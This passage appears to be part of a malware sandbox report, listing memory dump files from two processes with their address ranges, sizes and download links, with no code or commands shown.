memory/4736-5-0x0000023BA39F0000-0x0000023BA3A12000-memory.dmp

Filesize
136KB

Download
memory/4736-15-0x00007FFEFF5E0000-0x00007FFF000A1000-memory.dmp

Filesize
10.8MB

Download
memory/4736-16-0x00007FFEFF5E0000-0x00007FFF000A1000-memory.dmp

Filesize
10.8MB

Download
memory/4960-34-0x0000000005D10000-0x0000000005D2E000-memory.dmp

Filesize
120KB

Download
memory/4960-22-0x0000000005650000-0x00000000056B6000-memory.dmp

Filesize
408KB

Download
memory/4960-36-0x0000000007560000-0x0000000007BDA000-memory.dmp

Filesize
6.5MB

Download
memory/4960-35-0x0000000005DC0000-0x0000000005E0C000-memory.dmp

Filesize
304KB

Download
memory/4960-38-0x0000000006FE0000-0x0000000007076000-memory.dmp

Filesize
600KB

Download
memory/4960-33-0x0000000005830000-0x0000000005B84000-memory.dmp

Filesize
3.3MB

Download
memory/4960-23-0x00000000056C0000-0x0000000005726000-memory.dmp

Filesize
408KB

Download
memory/4960-37-0x00000000062C0000-0x00000000062DA000-memory.dmp

Filesize
104KB

Download
memory/4960-21-0x0000000004E70000-0x0000000004E92000-memory.dmp

Filesize
136KB

Download
memory/4960-20-0x0000000004F70000-0x0000000005598000-memory.dmp

Filesize
6.2MB

Download
memory/4960-19-0x00000000023E0000-0x0000000002416000-memory.dmp

Filesize
216KB

Download
memory/4960-39-0x0000000006F70000-0x0000000006F92000-memory.dmp

Filesize
136KB

Download
memory/4960-40-0x0000000008190000-0x0000000008734000-memory.dmp

Filesize
5.6MB

Download
memory/4960-42-0x0000000008740000-0x0000000009758000-memory.dmp

Filesize
16.1MB

Download